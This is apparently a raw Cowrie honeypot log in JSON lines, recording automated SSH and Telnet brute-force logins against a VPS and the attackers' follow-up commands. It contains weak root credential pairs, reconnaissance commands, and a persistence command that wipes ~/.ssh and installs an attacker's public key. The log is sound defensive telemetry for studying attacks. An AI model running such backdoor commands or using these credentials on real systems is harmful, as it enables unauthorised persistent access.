{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.510122Z","src_ip":"199.195.248.191","session":"24ff8f595aed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.866266Z","src_ip":"199.195.248.191","session":"24ff8f595aed"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.956605Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.957610Z","src_ip":"199.195.248.191","session":"24ff8f595aed"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54492,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c85c8ddb316","protocol":"ssh","message":"New connection: 217.154.1.158:54492 (1.2.3.4:22) [session: 2c85c8ddb316]","sensor":"my-vps","timestamp":"2025-08-26T19:58:30.726166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:58:30.726974Z","src_ip":"217.154.1.158","session":"2c85c8ddb316"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:58:30.742125Z","src_ip":"217.154.1.158","session":"2c85c8ddb316"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:58:30.785539Z","src_ip":"217.154.1.158","session":"2c85c8ddb316"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:31.801764Z","src_ip":"217.154.1.158","session":"2c85c8ddb316"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23077,"dst_ip":"1.2.3.4","dst_port":22,"session":"12810f10a201","protocol":"ssh","message":"New connection: 212.227.235.229:23077 (1.2.3.4:22) [session: 12810f10a201]","sensor":"my-vps","timestamp":"2025-08-26T19:58:34.324527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:58:34.336208Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:58:34.497041Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t^Y","message":"login attempt [root/1q@W3e$R5t^Y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:58:35.359079Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:58:35.708911Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T19:58:35.709742Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:35.879915Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:35.881181Z","src_ip":"212.227.235.229","session":"12810f10a201"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:44.601730Z","src_ip":"79.124.8.120","session":"5b350a67b10a"}
{"eventid":"cowrie.session.closed","duration":180.13083910942078,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:44.605738Z","src_ip":"79.124.8.120","session":"5b350a67b10a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51850,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7f69070dee","protocol":"ssh","message":"New connection: 217.154.1.158:51850 (1.2.3.4:22) [session: ae7f69070dee]","sensor":"my-vps","timestamp":"2025-08-26T19:58:48.220244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:58:48.225372Z","src_ip":"217.154.1.158","session":"ae7f69070dee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:58:48.234596Z","src_ip":"217.154.1.158","session":"ae7f69070dee"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:58:48.292551Z","src_ip":"217.154.1.158","session":"ae7f69070dee"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:49.308864Z","src_ip":"217.154.1.158","session":"ae7f69070dee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"95.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 95.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:54.358452Z","src_ip":"176.65.148.28","session":"90e59b93101b"}
{"eventid":"cowrie.session.closed","duration":96.02168035507202,"message":"Connection lost after 96 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:54.363692Z","src_ip":"176.65.148.28","session":"90e59b93101b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46178,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf38f02e20ac","protocol":"telnet","message":"New connection: 212.227.235.229:46178 (1.2.3.4:23) [session: bf38f02e20ac]","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.495472Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41856,"dst_ip":"1.2.3.4","dst_port":23,"session":"b955d4d7ad6c","protocol":"telnet","message":"New connection: 212.227.125.160:41856 (1.2.3.4:23) [session: b955d4d7ad6c]","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.535202Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.619328Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:59:03.713910Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.715035Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.715726Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.716849Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:59:03.732882Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.733900Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T19:59:03.734857Z","src_ip":"212.227.235.229","session":"bf38f02e20ac"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54792,"dst_ip":"1.2.3.4","dst_port":22,"session":"4399e18b393e","protocol":"ssh","message":"New connection: 217.154.1.158:54792 (1.2.3.4:22) [session: 4399e18b393e]","sensor":"my-vps","timestamp":"2025-08-26T19:59:05.872182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:59:05.873570Z","src_ip":"217.154.1.158","session":"4399e18b393e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:59:05.888146Z","src_ip":"217.154.1.158","session":"4399e18b393e"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:59:05.932246Z","src_ip":"217.154.1.158","session":"4399e18b393e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:06.948920Z","src_ip":"217.154.1.158","session":"4399e18b393e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56936,"dst_ip":"1.2.3.4","dst_port":22,"session":"40d8978aa4cf","protocol":"ssh","message":"New connection: 217.72.205.35:56936 (1.2.3.4:22) [session: 40d8978aa4cf]","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.241802Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.242913Z","src_ip":"217.72.205.35","session":"40d8978aa4cf"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":41236,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ea7a4e1f51a","protocol":"ssh","message":"New connection: 217.154.1.158:41236 (1.2.3.4:22) [session: 1ea7a4e1f51a]","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.388684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.389908Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.405133Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.450962Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:59:23.556924Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.557784Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.573598Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:23.575342Z","src_ip":"217.154.1.158","session":"1ea7a4e1f51a"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":46238,"dst_ip":"1.2.3.4","dst_port":22,"session":"e282a3758ed3","protocol":"ssh","message":"New connection: 199.195.248.191:46238 (1.2.3.4:22) [session: e282a3758ed3]","sensor":"my-vps","timestamp":"2025-08-26T19:59:26.842696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:59:26.844692Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:59:26.942727Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.login.success","username":"root","password":"Root2023!","message":"login attempt [root/Root2023!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.298316Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:59:27.581634Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.582381Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.583146Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.671433Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:59:27.866807Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.867582Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
